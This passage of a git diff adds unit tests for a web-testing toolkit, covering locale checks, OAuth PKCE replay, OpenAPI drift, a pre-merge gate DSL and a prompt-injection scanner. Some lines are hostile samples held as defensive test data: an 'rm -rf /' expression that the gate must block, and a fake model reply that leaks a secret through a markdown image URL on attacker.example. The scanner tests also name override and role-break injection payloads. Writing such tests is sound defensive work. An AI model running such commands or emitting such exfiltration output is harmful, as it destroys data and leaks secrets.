self.assertRaises(MqAssertError): + drain_topic(object(), "t") # NOSONAR python:S5655 - deliberate bad input + + def test_non_seq_return(self): + class C: + def drain(self, topic, *, timeout=5.0): + return "nope" + with self.assertRaises(MqAssertError): + drain_topic(C(), "t") + + def test_bad_message_shape(self): + c = FakeConsumer([42]) + with self.assertRaises(MqAssertError): + drain_topic(c, "t") + + +class TestAssertPublished(unittest.TestCase): + + def test_pass(self): + msgs = [Message(topic="t", body={"event": "login"}, key="u1")] + found = assert_message_published(msgs, body_contains={"event": "login"}) + self.assertEqual(found.key, "u1") + + def test_key_match(self): + msgs = [Message(topic="t", body={}, key="u1")] + assert_message_published(msgs, key_matches="u1") + + def test_header_match(self): + msgs = [Message(topic="t", body={}, headers={"x": "y"})] + assert_message_published(msgs, header_equals={"x": "y"}) + + def test_json_string_body(self): + msgs = [Message(topic="t", body='{"event": "login"}')] + assert_message_published(msgs, body_contains={"event": "login"}) + + def test_bytes_body(self): + msgs = [Message(topic="t", body=b'{"event":"login"}')] + assert_message_published(msgs, body_contains={"event": "login"}) + + def test_fail(self): + msgs = [Message(topic="t", body={"event": "logout"})] + with self.assertRaises(MqAssertError): + assert_message_published(msgs, body_contains={"event": "login"}) + + def test_invalid_messages(self): + with self.assertRaises(MqAssertError): + assert_message_published("nope") + + +class TestAssertNo(unittest.TestCase): + + def test_pass(self): + assert_no_message([Message(topic="other", body={})], topic="x") + + def test_fail(self): + with self.assertRaises(MqAssertError): + assert_no_message( + [Message(topic="t", body={"pii": True})], + topic="t", body_contains={"pii": True}, + ) + + +class TestIdempotent(unittest.TestCase): + + def test_pass(self): + assert_idempotent([Message(topic="t", body={}, key="a")], key="a") + + def test_fail(self): + with self.assertRaises(MqAssertError): + assert_idempotent([ + Message(topic="t", body={}, key="a"), + Message(topic="t", body={}, key="a"), + ], key="a") + + +class TestOrdered(unittest.TestCase): + + def test_pass(self): + msgs = [ + Message(topic="t", body={"type": "created"}, key="x"), + Message(topic="t", body={"type": "shipped"}, key="x"), + ] + assert_ordered(msgs, key="x", expected_order=["created", "shipped"]) + + def test_fail(self): + msgs = [ + Message(topic="t", body={"type": "shipped"}, key="x"), + Message(topic="t", body={"type": "created"}, key="x"), + ] + with self.assertRaises(MqAssertError): + assert_ordered(msgs, key="x", + expected_order=["created", "shipped"]) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_number_currency_locale.py b/test/unit_test/test_number_currency_locale.py new file mode 100644 index 0000000..966f95c --- /dev/null +++ b/test/unit_test/test_number_currency_locale.py @@ -0,0 +1,82 @@ +"""Unit tests for je_web_runner.utils.number_currency_locale.""" +import unittest + +from je_web_runner.utils.number_currency_locale.locale import ( + NumberCurrencyLocaleError, + assert_currency_symbol, + assert_date_format, + assert_number_format, +) + + +class TestNumber(unittest.TestCase): + + def test_us(self): + assert_number_format("1,234.56", "en-US") + + def test_de(self): + assert_number_format("1.234,56", "de-DE") + + def test_us_in_de_raises(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_number_format("1,234.56", "de-DE") + + def test_indian(self): + assert_number_format("1,23,456.78", "hi-IN") + + def test_indian_wrong_grouping(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_number_format("1,234,567.00", "hi-IN") + + def test_unknown_locale(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_number_format("1,234", "xx-YY") + + def test_empty(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_number_format("", "en-US") + + def test_no_numbers(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_number_format("abc", "en-US") + + +class TestCurrency(unittest.TestCase): + + def test_us_dollar(self): + assert_currency_symbol("$1,234.56", "en-US") + + def test_de_euro_suffix(self): + assert_currency_symbol("1.234,56 €", "de-DE") + + def test_missing_symbol(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_currency_symbol("1,234.56", "en-US") + + def test_unknown_locale(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_currency_symbol("1,234", "xx-YY") + + +class TestDate(unittest.TestCase): + + def test_iso(self): + assert_date_format("2026-05-24", "iso") + + def test_us(self): + assert_date_format("5/24/2026", "us") + + def test_eu(self): + assert_date_format("24.5.2026", "eu") + + def test_iso_against_us_fails(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_date_format("2026-05-24", "us") + + def test_unknown_format(self): + with self.assertRaises(NumberCurrencyLocaleError): + assert_date_format("x", "weird") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_oauth_pkce_replay.py b/test/unit_test/test_oauth_pkce_replay.py new file mode 100644 index 0000000..55afb97 --- /dev/null +++ b/test/unit_test/test_oauth_pkce_replay.py @@ -0,0 +1,115 @@ +"""Unit tests for je_web_runner.utils.oauth_pkce_replay.""" +import unittest + +from je_web_runner.utils.oauth_pkce_replay.replay import ( + OauthPkceReplayError, + ReplayCase, + ReplayOutcome, + ReplayResult, + TokenExchangeResponse, + assert_all_rejected, + challenge_for, + generate_verifier, + replay, + run_cases, +) + + +class TestPkceHelpers(unittest.TestCase): + + def test_verifier_length(self): + v = generate_verifier(length=64) + self.assertGreaterEqual(len(v), 43) + + def test_verifier_bad_length(self): + with self.assertRaises(OauthPkceReplayError): + generate_verifier(length=10) + with self.assertRaises(OauthPkceReplayError): + generate_verifier(length=200) + + def test_challenge_deterministic(self): + c = challenge_for("test_verifier_string") + self.assertEqual(c, challenge_for("test_verifier_string")) + + def test_challenge_no_padding(self): + self.assertFalse(challenge_for("x").endswith("=")) + + def test_empty_verifier(self): + with self.assertRaises(OauthPkceReplayError): + challenge_for("") + + +class TestReplay(unittest.TestCase): + + def test_rejected_outcome(self): + def probe(payload): + return TokenExchangeResponse( + status_code=400, body={"error": "invalid_grant"}, + ) + result = replay(ReplayCase(name="x", payload={}), probe) + self.assertEqual(result.outcome, ReplayOutcome.REJECTED) + + def test_accepted_outcome_is_bug(self): + def probe(payload): + return TokenExchangeResponse( + status_code=200, body={"access_token": "abc"}, + ) + result = replay(ReplayCase(name="x", payload={}), probe) + self.assertEqual(result.outcome, ReplayOutcome.ACCEPTED) + + def test_server_error_ambiguous(self): + def probe(payload): + return TokenExchangeResponse(status_code=502, body={}) + result = replay(ReplayCase(name="x", payload={}), probe) + self.assertEqual(result.outcome, ReplayOutcome.AMBIGUOUS) + + def test_probe_exception(self): + def boom(p): + raise RuntimeError("net") + with self.assertRaises(OauthPkceReplayError): + replay(ReplayCase(name="x", payload={}), boom) + + def test_rejects_non_case(self): + with self.assertRaises(OauthPkceReplayError): + replay("nope", lambda p: TokenExchangeResponse(200, {})) + + def test_non_callable(self): + with self.assertRaises(OauthPkceReplayError): + replay(ReplayCase("x", {}), "nope") + + def test_bad_probe_return(self): + with self.assertRaises(OauthPkceReplayError): + replay(ReplayCase("x", {}), lambda p: "nope") + + +class TestRunCases(unittest.TestCase): + + def test_all_rejected(self): + results = run_cases( + [ReplayCase("a", {}), ReplayCase("b", {})], + lambda p: TokenExchangeResponse(400, {"error": "invalid_grant"}), + ) + self.assertEqual([r.outcome for r in results], + [ReplayOutcome.REJECTED, ReplayOutcome.REJECTED]) + + def test_empty_cases(self): + with self.assertRaises(OauthPkceReplayError): + run_cases([], lambda p: TokenExchangeResponse(400, {})) + + +class TestAssertRejected(unittest.TestCase): + + def test_pass(self): + assert_all_rejected([ReplayResult( + case="x", outcome=ReplayOutcome.REJECTED, status_code=400, + )]) + + def test_fail(self): + with self.assertRaises(OauthPkceReplayError): + assert_all_rejected([ReplayResult( + case="x", outcome=ReplayOutcome.ACCEPTED, status_code=200, + )]) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_openapi_drift.py b/test/unit_test/test_openapi_drift.py new file mode 100644 index 0000000..0132e43 --- /dev/null +++ b/test/unit_test/test_openapi_drift.py @@ -0,0 +1,107 @@ +"""Unit tests for je_web_runner.utils.openapi_drift.""" +import unittest + +from je_web_runner.utils.openapi_drift.drift import ( + ApiObservation, + DriftReport, + OpenapiDriftError, + assert_no_undocumented, + assert_no_zombies, + diff, +) + + +SPEC = { + "paths": { + "/users": { + "get": {"responses": {"200": {}}}, + "post": {"responses": {"201": {}, "400": {}}}, + }, + "/users/{id}": { + "get": {"responses": {"200": {}, "404": {}}}, + }, + "/legacy": { + "get": {"responses": {"200": {}}}, + }, + }, +} + + +class TestDiff(unittest.TestCase): + + def test_documented_traffic_clean(self): + report = diff(SPEC, [ + ApiObservation(method="GET", path="/users", status_code=200), + ApiObservation(method="POST", path="/users", status_code=201), + ApiObservation(method="GET", path="/users/42", status_code=200), + ]) + self.assertEqual(report.undocumented, []) + + def test_undocumented_path(self): + report = diff(SPEC, [ + ApiObservation(method="GET", path="/admin", status_code=200), + ]) + self.assertIn("GET /admin", report.undocumented) + + def test_undocumented_method(self): + report = diff(SPEC, [ + ApiObservation(method="DELETE", path="/users", status_code=204), + ]) + self.assertIn("DELETE /users", report.undocumented_methods) + + def test_zombie(self): + report = diff(SPEC, [ + ApiObservation(method="GET", path="/users", status_code=200), + ]) + self.assertIn("GET /legacy", report.zombie) + + def test_undocumented_status(self): + report = diff(SPEC, [ + ApiObservation(method="GET", path="/users", status_code=500), + ]) + self.assertIn("GET /users → 500", report.undocumented_statuses) + + def test_path_param_normalises(self): + report = diff(SPEC, [ + ApiObservation(method="GET", path="/users/abc-123", status_code=404), + ]) + self.assertEqual(report.undocumented, []) + + def test_bad_spec(self): + with self.assertRaises(OpenapiDriftError): + diff("nope", []) + + def test_bad_obs(self): + with self.assertRaises(OpenapiDriftError): + diff(SPEC, ["nope"]) + + +class TestAssertUndocumented(unittest.TestCase): + + def test_pass(self): + assert_no_undocumented(DriftReport()) + + def test_fail(self): + with self.assertRaises(OpenapiDriftError): + assert_no_undocumented(DriftReport(undocumented=["GET /x"])) + + +class TestAssertZombies(unittest.TestCase): + + def test_pass(self): + assert_no_zombies(DriftReport()) + + def test_threshold(self): + assert_no_zombies(DriftReport(zombie=["x"]), max_zombies=1) + + def test_fail(self): + with self.assertRaises(OpenapiDriftError): + assert_no_zombies(DriftReport(zombie=["x", "y"]), max_zombies=1) + + def test_bad_max(self): + with self.assertRaises(OpenapiDriftError): + assert_no_zombies(DriftReport(), max_zombies=-1) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_payment_request_assert.py b/test/unit_test/test_payment_request_assert.py new file mode 100644 index 0000000..5a9dce1 --- /dev/null +++ b/test/unit_test/test_payment_request_assert.py @@ -0,0 +1,129 @@ +"""Unit tests for je_web_runner.utils.payment_request_assert.""" +import unittest + +from je_web_runner.utils.payment_request_assert.payment import ( + CompletedPayment, + ConstructedPaymentRequest, + INSTALL_SCRIPT, + PaymentLog, + PaymentRequestAssertError, + assert_completed, + assert_shipping_required, + assert_supports, + assert_total_currency, + parse_log, +) + + +class TestScript(unittest.TestCase): + + def test_contains(self): + self.assertIn("PaymentRequest", INSTALL_SCRIPT) + self.assertIn("__wr_payment__", INSTALL_SCRIPT) + + +class TestParse(unittest.TestCase): + + def test_basic(self): + log = parse_log({ + "constructed": [{"methodData": [{"supportedMethods": "basic-card"}], + "details": {}, "options": {}}], + "completed": [{"status": "success"}], + }) + self.assertEqual(len(log.constructed), 1) + + def test_bad(self): + with self.assertRaises(PaymentRequestAssertError): + parse_log("nope") + + def test_skip_non_dict(self): + log = parse_log({"constructed": ["x"], "completed": ["y"]}) + self.assertEqual(len(log.constructed), 0) + + +class TestSupports(unittest.TestCase): + + def test_pass(self): + assert_supports( + PaymentLog(constructed=[ConstructedPaymentRequest( + method_data=[{"supportedMethods": "https://apple.com/apple-pay"}], + )]), + method="https://apple.com/apple-pay", + ) + + def test_fail(self): + with self.assertRaises(PaymentRequestAssertError): + assert_supports( + PaymentLog(constructed=[ConstructedPaymentRequest( + method_data=[{"supportedMethods": "basic-card"}], + )]), + method="https://google.com/pay", + ) + + def test_no_pr(self): + with self.assertRaises(PaymentRequestAssertError): + assert_supports(PaymentLog(), method="x") + + def test_empty_method(self): + with self.assertRaises(PaymentRequestAssertError): + assert_supports(PaymentLog(), method="") + + +class TestCurrency(unittest.TestCase): + + def test_pass(self): + assert_total_currency( + PaymentLog(constructed=[ConstructedPaymentRequest( + details={"total": {"amount": {"currency": "USD", "value": "10"}}}, + )]), + currency="USD", + ) + + def test_fail(self): + with self.assertRaises(PaymentRequestAssertError): + assert_total_currency( + PaymentLog(constructed=[ConstructedPaymentRequest( + details={"total": {"amount": {"currency": "EUR", "value": "10"}}}, + )]), + currency="USD", + ) + + def test_empty(self): + with self.assertRaises(PaymentRequestAssertError): + assert_total_currency(PaymentLog(), currency="") + + +class TestCompleted(unittest.TestCase): + + def test_pass(self): + assert_completed(PaymentLog(completed=[CompletedPayment(status="success")])) + + def test_fail_status(self): + with self.assertRaises(PaymentRequestAssertError): + assert_completed(PaymentLog(completed=[CompletedPayment(status="fail")])) + + def test_never_completed(self): + with self.assertRaises(PaymentRequestAssertError): + assert_completed(PaymentLog()) + + def test_bad_status(self): + with self.assertRaises(PaymentRequestAssertError): + assert_completed(PaymentLog(), status="weird") + + +class TestShipping(unittest.TestCase): + + def test_pass(self): + assert_shipping_required(PaymentLog(constructed=[ + ConstructedPaymentRequest(options={"requestShipping": True}), + ])) + + def test_fail(self): + with self.assertRaises(PaymentRequestAssertError): + assert_shipping_required(PaymentLog(constructed=[ + ConstructedPaymentRequest(options={}), + ])) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_pip_assert.py b/test/unit_test/test_pip_assert.py new file mode 100644 index 0000000..6c74c96 --- /dev/null +++ b/test/unit_test/test_pip_assert.py @@ -0,0 +1,100 @@ +"""Unit tests for je_web_runner.utils.pip_assert.""" +import unittest + +from je_web_runner.utils.pip_assert.pip import ( + INSTALL_SCRIPT, + Mode, + PipAssertError, + PipEvent, + PipLog, + assert_entered, + assert_exited_cleanly, + assert_size_at_least, + parse_log, +) + + +class TestScript(unittest.TestCase): + + def test_contains(self): + self.assertIn("requestPictureInPicture", INSTALL_SCRIPT) + + +class TestParse(unittest.TestCase): + + def test_basic(self): + log = parse_log([{"kind": "enter", "mode": "video"}]) + self.assertEqual(log.events[0].mode, Mode.VIDEO) + + def test_document(self): + log = parse_log([{"kind": "enter", "mode": "document", + "width": 400, "height": 300}]) + self.assertEqual(log.events[0].width, 400) + + def test_bad_mode(self): + with self.assertRaises(PipAssertError): + parse_log([{"kind": "enter", "mode": "weird"}]) + + def test_skip_bad_kind(self): + log = parse_log([{"kind": "weird", "mode": "video"}]) + self.assertEqual(len(log.events), 0) + + def test_bad_payload(self): + with self.assertRaises(PipAssertError): + parse_log("nope") + + +class TestEntered(unittest.TestCase): + + def test_pass(self): + assert_entered(PipLog(events=[PipEvent(kind="enter", mode=Mode.VIDEO)])) + + def test_fail(self): + with self.assertRaises(PipAssertError): + assert_entered(PipLog()) + + def test_doc(self): + assert_entered(PipLog(events=[ + PipEvent(kind="enter", mode=Mode.DOCUMENT), + ]), mode=Mode.DOCUMENT) + + +class TestExited(unittest.TestCase): + + def test_pass(self): + assert_exited_cleanly(PipLog(events=[ + PipEvent(kind="enter", mode=Mode.VIDEO), + PipEvent(kind="exit", mode=Mode.VIDEO), + ])) + + def test_dangling(self): + with self.assertRaises(PipAssertError): + assert_exited_cleanly(PipLog(events=[ + PipEvent(kind="enter", mode=Mode.VIDEO), + ])) + + +class TestSize(unittest.TestCase): + + def test_pass(self): + assert_size_at_least( + PipLog(events=[PipEvent(kind="enter", mode=Mode.DOCUMENT, + width=400, height=300)]), + min_width=300, min_height=200, + ) + + def test_fail(self): + with self.assertRaises(PipAssertError): + assert_size_at_least( + PipLog(events=[PipEvent(kind="enter", mode=Mode.DOCUMENT, + width=100, height=100)]), + min_width=300, min_height=200, + ) + + def test_bad_min(self): + with self.assertRaises(PipAssertError): + assert_size_at_least(PipLog(), min_width=0, min_height=0) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_popover_assert.py b/test/unit_test/test_popover_assert.py new file mode 100644 index 0000000..f8a2c3b --- /dev/null +++ b/test/unit_test/test_popover_assert.py @@ -0,0 +1,131 @@ +"""Unit tests for je_web_runner.utils.popover_assert.""" +import unittest + +from je_web_runner.utils.popover_assert.popover import ( + HARVEST_SCRIPT, + PopoverAssertError, + PopoverKind, + PopoverState, + assert_closed, + assert_invoker_link, + assert_no_open, + assert_only_one_modal, + assert_open, + parse_snapshot, +) + + +def _raw(id_, *, kind="dialog", open_=False, modal=False, invoker=None): + return {"id": id_, "kind": kind, "open": open_, "modal": modal, "invoker": invoker} + + +class TestHarvestScript(unittest.TestCase): + + def test_script_uses_popover_open(self): + self.assertIn(":popover-open", HARVEST_SCRIPT) + self.assertIn("querySelectorAll", HARVEST_SCRIPT) + + +class TestParseSnapshot(unittest.TestCase): + + def test_basic(self): + states = parse_snapshot([_raw("d1", open_=True, modal=True)]) + self.assertEqual(states[0].kind, PopoverKind.DIALOG) + self.assertTrue(states[0].modal) + + def test_unknown_kind(self): + with self.assertRaises(PopoverAssertError): + parse_snapshot([{"kind": "weird", "open": True}]) + + def test_skips_non_dict(self): + self.assertEqual(parse_snapshot(["x", None]), []) + + def test_rejects_non_list(self): + with self.assertRaises(PopoverAssertError): + parse_snapshot({"x": 1}) + + +class TestAssertOpen(unittest.TestCase): + + def test_pass(self): + states = parse_snapshot([_raw("d", open_=True)]) + assert_open(states, id_="d") + + def test_closed_fails(self): + states = parse_snapshot([_raw("d", open_=False)]) + with self.assertRaises(PopoverAssertError): + assert_open(states, id_="d") + + def test_missing_fails(self): + with self.assertRaises(PopoverAssertError): + assert_open([], id_="missing") + + def test_empty_id(self): + with self.assertRaises(PopoverAssertError): + assert_open([], id_="") + + +class TestAssertClosed(unittest.TestCase): + + def test_pass(self): + assert_closed(parse_snapshot([_raw("d", open_=False)]), id_="d") + + def test_open_fails(self): + with self.assertRaises(PopoverAssertError): + assert_closed(parse_snapshot([_raw("d", open_=True)]), id_="d") + + +class TestOnlyOneModal(unittest.TestCase): + + def test_zero_or_one_passes(self): + assert_only_one_modal([]) + assert_only_one_modal(parse_snapshot([_raw("d", modal=True, open_=True)])) + + def test_two_modal_fails(self): + states = parse_snapshot([ + _raw("a", modal=True, open_=True), + _raw("b", modal=True, open_=True), + ]) + with self.assertRaises(PopoverAssertError): + assert_only_one_modal(states) + + +class TestInvokerLink(unittest.TestCase): + + def test_pass(self): + states = parse_snapshot([ + _raw("menu", kind="auto", open_=True, invoker="btn1"), + ]) + assert_invoker_link(states, popover_id="menu", invoker_id="btn1") + + def test_mismatch(self): + states = parse_snapshot([ + _raw("menu", kind="auto", open_=True, invoker="btn2"), + ]) + with self.assertRaises(PopoverAssertError): + assert_invoker_link(states, popover_id="menu", invoker_id="btn1") + + def test_missing(self): + with self.assertRaises(PopoverAssertError): + assert_invoker_link([], popover_id="menu", invoker_id="btn1") + + +class TestNoOpen(unittest.TestCase): + + def test_pass(self): + assert_no_open(parse_snapshot([_raw("d", open_=False)])) + + def test_fails(self): + with self.assertRaises(PopoverAssertError): + assert_no_open(parse_snapshot([_raw("d", open_=True)])) + + +class TestToDict(unittest.TestCase): + + def test_kind_value(self): + s = PopoverState(kind=PopoverKind.POPOVER_AUTO, open=True, id="x") + self.assertEqual(s.to_dict()["kind"], "auto") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_pr_title_generator.py b/test/unit_test/test_pr_title_generator.py new file mode 100644 index 0000000..7d02fa2 --- /dev/null +++ b/test/unit_test/test_pr_title_generator.py @@ -0,0 +1,125 @@ +"""Unit tests for je_web_runner.utils.pr_title_generator.""" +import unittest + +from je_web_runner.utils.pr_title_generator.generate import ( + PrTitleGeneratorError, + assert_conventional, + suggest_title, + suggest_title_with_llm, +) + + +class TestSuggest(unittest.TestCase): + + def test_test_directory_classified_as_test(self): + title = suggest_title( + files=["test/unit_test/test_foo.py"], + commits=["Add foo unit test"], + ) + self.assertTrue(title.startswith("test")) + + def test_docs_md(self): + title = suggest_title(files=["README.md"], commits=["Update README"]) + self.assertTrue(title.startswith("docs")) + + def test_ci(self): + title = suggest_title( + files=[".github/workflows/build.yml"], + commits=["bump action"], + ) + self.assertTrue(title.startswith("ci")) + + def test_build(self): + title = suggest_title(files=["pyproject.toml"], + commits=["bump deps"]) + self.assertTrue(title.startswith("build")) + + def test_fix_from_commit_prefix(self): + title = suggest_title(files=["src/x.py"], + commits=["fix: handle null"]) + self.assertTrue(title.startswith("fix")) + + def test_scope_from_src(self): + title = suggest_title(files=["src/auth/login.py"], + commits=["Add login validation"]) + self.assertIn("(auth)", title) + + def test_breaking_marker(self): + title = suggest_title(files=["src/api/x.py"], + commits=["Rename endpoint"], + breaking=True) + self.assertIn("!", title) + + def test_truncates_long(self): + title = suggest_title( + files=["src/x.py"], + commits=["Add a very long summary " + "x" * 200], + ) + self.assertLessEqual(len(title), 72) + + def test_empty_rejected(self): + with self.assertRaises(PrTitleGeneratorError): + suggest_title(files=[], commits=[]) + + def test_bad_files_type(self): + with self.assertRaises(PrTitleGeneratorError): + suggest_title(files="nope", commits=[]) + + def test_bad_commits_type(self): + with self.assertRaises(PrTitleGeneratorError): + suggest_title(files=[], commits="nope") + + def test_default_feat(self): + title = suggest_title(files=["other/x.py"], commits=["new feature"]) + self.assertTrue(title.startswith("feat")) + + +class TestLlm(unittest.TestCase): + + def test_pass(self): + title = suggest_title_with_llm( + files=["x"], commits=["y"], + titler=lambda f, c: "feat(x): great", + ) + self.assertEqual(title, "feat(x): great") + + def test_non_callable(self): + with self.assertRaises(PrTitleGeneratorError): + suggest_title_with_llm([], [], titler="nope") + + def test_bad_return(self): + with self.assertRaises(PrTitleGeneratorError): + suggest_title_with_llm([], [], titler=lambda f, c: "") + + def test_truncates(self): + title = suggest_title_with_llm( + ["x"], ["y"], titler=lambda f, c: "feat: " + "x" * 200, + ) + self.assertLessEqual(len(title), 72) + + def test_propagates(self): + def boom(_f, _c): + raise RuntimeError("boom") + with self.assertRaises(PrTitleGeneratorError): + suggest_title_with_llm(["x"], ["y"], titler=boom) + + +class TestAssertConventional(unittest.TestCase): + + def test_pass(self): + assert_conventional("feat(api): add login") + + def test_breaking_ok(self): + assert_conventional("fix(api)!: remove field") + + def test_fail(self): + with self.assertRaises(PrTitleGeneratorError): + assert_conventional("update stuff") + + def test_bad_type(self): + with self.assertRaises(PrTitleGeneratorError): + assert_conventional(123) # NOSONAR python:S5655 - deliberate bad input + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_pre_merge_gate_dsl.py b/test/unit_test/test_pre_merge_gate_dsl.py new file mode 100644 index 0000000..391a9b9 --- /dev/null +++ b/test/unit_test/test_pre_merge_gate_dsl.py @@ -0,0 +1,176 @@ +"""Unit tests for je_web_runner.utils.pre_merge_gate_dsl.""" +import unittest + +from je_web_runner.utils.pre_merge_gate_dsl.gate import ( + PreMergeGateDslError, + PrFacts, + Rule, + assert_gate_passes, + evaluate, + parse_rules, +) + + +class TestPrFacts(unittest.TestCase): + + def test_docs_only_true(self): + self.assertTrue(PrFacts(files_changed=["README.md"]).is_docs_only) + + def test_docs_only_false(self): + self.assertFalse( + PrFacts(files_changed=["src/x.py", "README.md"]).is_docs_only, + ) + + def test_has_path(self): + self.assertTrue( + PrFacts(files_changed=["src/payments/x.py"]) + .has_path("src/payments/*"), + ) + + +class TestRule(unittest.TestCase): + + def test_basic(self): + Rule(when="facts.is_docs_only", require=["one_reviewer"]) + + def test_empty_when(self): + with self.assertRaises(PreMergeGateDslError): + Rule(when="", require=["x"]) + + def test_empty_require(self): + with self.assertRaises(PreMergeGateDslError): + Rule(when="facts.is_docs_only", require=[]) + + +class TestParseRules(unittest.TestCase): + + def test_basic(self): + rules = parse_rules([ + {"when": "facts.is_docs_only", "require": ["one_reviewer"]}, + ]) + self.assertEqual(len(rules), 1) + + def test_non_list(self): + with self.assertRaises(PreMergeGateDslError): + parse_rules("nope") + + def test_non_dict(self): + with self.assertRaises(PreMergeGateDslError): + parse_rules(["nope"]) + + +class TestEvaluate(unittest.TestCase): + + def test_docs_only_pass(self): + result = evaluate( + [Rule(when="facts.is_docs_only", require=["one_reviewer"])], + PrFacts(files_changed=["README.md"], review_approvals=1), + ) + self.assertTrue(result.passed) + + def test_docs_only_fail(self): + result = evaluate( + [Rule(when="facts.is_docs_only", require=["one_reviewer"])], + PrFacts(files_changed=["README.md"], review_approvals=0), + ) + self.assertFalse(result.passed) + + def test_payments_path_strict(self): + result = evaluate( + [Rule(when="facts.has_path('src/payments/*')", + require=["two_reviewers", "pr_title_has_jira"])], + PrFacts(files_changed=["src/payments/x.py"], + review_approvals=1, title="big update"), + ) + self.assertFalse(result.passed) + self.assertEqual(len(result.failures), 2) + + def test_skip_rule_when_unmet(self): + result = evaluate( + [Rule(when="facts.is_docs_only", require=["two_reviewers"])], + PrFacts(files_changed=["src/x.py"], review_approvals=0), + ) + self.assertTrue(result.passed) + + def test_unknown_predicate(self): + with self.assertRaises(PreMergeGateDslError): + evaluate( + [Rule(when="facts.is_docs_only", require=["nonsense"])], + PrFacts(files_changed=["README.md"]), + ) + + def test_unsafe_expression_blocked(self): + with self.assertRaises(PreMergeGateDslError): + evaluate( + [Rule(when="__import__('os').system('rm -rf /')", + require=["one_reviewer"])], + PrFacts(), + ) + + def test_non_bool_when_blocked(self): + with self.assertRaises(PreMergeGateDslError): + evaluate( + [Rule(when="facts.title", require=["one_reviewer"])], + PrFacts(title="x"), + ) + + def test_bad_facts_type(self): + with self.assertRaises(PreMergeGateDslError): + evaluate([], "nope") + + def test_custom_predicate(self): + result = evaluate( + [Rule(when="facts.is_docs_only", require=["custom"])], + PrFacts(files_changed=["README.md"]), + predicates={"custom": lambda f: None}, + ) + self.assertTrue(result.passed) + + +class TestBuiltins(unittest.TestCase): + + def test_jira_pass(self): + result = evaluate( + [Rule(when="facts.is_docs_only", require=["pr_title_has_jira"])], + PrFacts(title="ABC-123 update", files_changed=["README.md"]), + ) + self.assertTrue(result.passed) + + def test_flake_regression(self): + result = evaluate( + [Rule(when="facts.is_docs_only", + require=["no_flake_regression"])], + PrFacts(files_changed=["README.md"], flake_score_delta=0.5), + ) + self.assertFalse(result.passed) + + def test_small_pr(self): + result = evaluate( + [Rule(when="facts.is_docs_only", require=["small_pr"])], + PrFacts(files_changed=["README.md"], additions=500, deletions=10), + ) + self.assertFalse(result.passed) + + def test_no_failing_checks(self): + result = evaluate( + [Rule(when="facts.is_docs_only", + require=["no_failing_checks"])], + PrFacts(files_changed=["README.md"], failing_checks=["unit"]), + ) + self.assertFalse(result.passed) + + +class TestAssert(unittest.TestCase): + + def test_pass(self): + from je_web_runner.utils.pre_merge_gate_dsl.gate import GateResult + assert_gate_passes(GateResult(passed=True)) + + def test_fail(self): + from je_web_runner.utils.pre_merge_gate_dsl.gate import GateResult + with self.assertRaises(PreMergeGateDslError): + assert_gate_passes(GateResult(passed=False, failures=["x"])) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_prompt_injection_scanner.py b/test/unit_test/test_prompt_injection_scanner.py new file mode 100644 index 0000000..c8620c4 --- /dev/null +++ b/test/unit_test/test_prompt_injection_scanner.py @@ -0,0 +1,130 @@ +"""Unit tests for je_web_runner.utils.prompt_injection_scanner.""" +import unittest + +from je_web_runner.utils.prompt_injection_scanner.scanner import ( + DEFAULT_PAYLOADS, + Finding, + Payload, + PromptInjectionScannerError, + ScanReport, + Severity, + assert_no_leaks, + scan, +) + + +class FakeClient: + def __init__(self, response): + self.response = response + + def ask(self, prompt): + if isinstance(self.response, Exception): + raise self.response + return self.response if isinstance(self.response, str) else self.response(prompt) + + +class TestDefaults(unittest.TestCase): + + def test_payloads_loaded(self): + names = {p.name for p in DEFAULT_PAYLOADS} + for needed in ("ignore_previous", "canary_extract", "role_break"): + self.assertIn(needed, names) + + +class TestScan(unittest.TestCase): + + def test_no_leak_when_client_refuses(self): + client = FakeClient("I can't help with that request.") + report = scan(client) + self.assertTrue(report.passed()) + # Refused markers detected + any_refused = any(f.refused for f in report.findings) + self.assertTrue(any_refused) + + def test_canary_leak_detected(self): + client = FakeClient("Sure! The token is ~CANARY-WR-DEADBEEF~ here.") + report = scan(client) + leak = next(f for f in report.findings if f.payload == "canary_extract") + self.assertTrue(leak.leaked) + self.assertEqual(leak.severity, Severity.CRITICAL) + + def test_markdown_exfil_caught(self): + client = FakeClient( + "Summary done. ![x](https://attacker.example/?q=secret)" + ) + report = scan(client) + finding = next(f for f in report.findings if f.payload == "markdown_exfil") + self.assertTrue(finding.leaked) + + def test_custom_payloads(self): + report = scan( + FakeClient("hello world"), + payloads=[Payload( + name="x", prompt="trigger", severity=Severity.MEDIUM, + leak_indicators=("world",), + )], + ) + self.assertTrue(report.findings[0].leaked) + + def test_client_missing_ask(self): + with self.assertRaises(PromptInjectionScannerError): + scan(object()) # no .ask method # NOSONAR python:S5655 - deliberate bad input + + def test_empty_payloads(self): + with self.assertRaises(PromptInjectionScannerError): + scan(FakeClient("x"), payloads=[]) + + def test_client_raises(self): + with self.assertRaises(PromptInjectionScannerError): + scan(FakeClient(RuntimeError("rate limit"))) + + def test_non_string_response(self): + class WeirdClient: + def ask(self, prompt): + return 42 + with self.assertRaises(PromptInjectionScannerError): + scan(WeirdClient()) + + +class TestAssertNoLeaks(unittest.TestCase): + + def test_pass(self): + assert_no_leaks(ScanReport()) + + def test_high_blocks(self): + report = ScanReport(findings=[Finding( + payload="x", severity=Severity.HIGH, leaked=True, + response_excerpt="leaked", + )]) + with self.assertRaises(PromptInjectionScannerError): + assert_no_leaks(report) + + def test_low_below_threshold(self): + report = ScanReport(findings=[Finding( + payload="x", severity=Severity.LOW, leaked=True, + response_excerpt="x", + )]) + # Threshold defaults to HIGH; LOW leak should not raise. + 